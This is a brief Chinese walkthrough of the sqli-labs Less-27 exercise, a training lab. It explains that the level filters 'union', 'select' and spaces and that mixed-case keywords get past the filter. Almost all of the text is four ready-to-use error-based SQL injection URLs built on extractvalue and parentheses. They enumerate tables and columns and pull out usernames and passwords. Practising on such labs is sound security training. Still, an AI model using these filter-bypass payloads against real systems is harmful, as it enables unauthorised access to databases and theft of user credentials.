题目告诉我们本关卡过滤了 union 和 select,其实还有空格,这一关也过滤了
尝试双写绕过,不行
那就大小写绕过,成功
–查表
http://sqlilabs/Less-27/?id=1'and(extractvalue(1,concat(0x7e,(SeLect(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e)))and'1'='1
–查列
http://sqlilabs/Less-27/?id=1'and(extractvalue(1,concat(0x7e,(SeLect(group_concat(column_name))from(information_schema.columns)where(table_schema=database())and(table_name='users')),0x7e)))and'1'='1
–查数据
http://sqlilabs/Less-27/?id=1'and(extractvalue(1,concat(0x7e,(SeLect(group_concat(username))from(users)),0x7e)))and'1'='1
http://sqlilabs/Less-27/?id=1'and(extractvalue(1,concat(0x7e,(SeLect(group_concat(password))from(users)),0x7e)))and'1'='1
数据不全可以加 id 条件查询
😄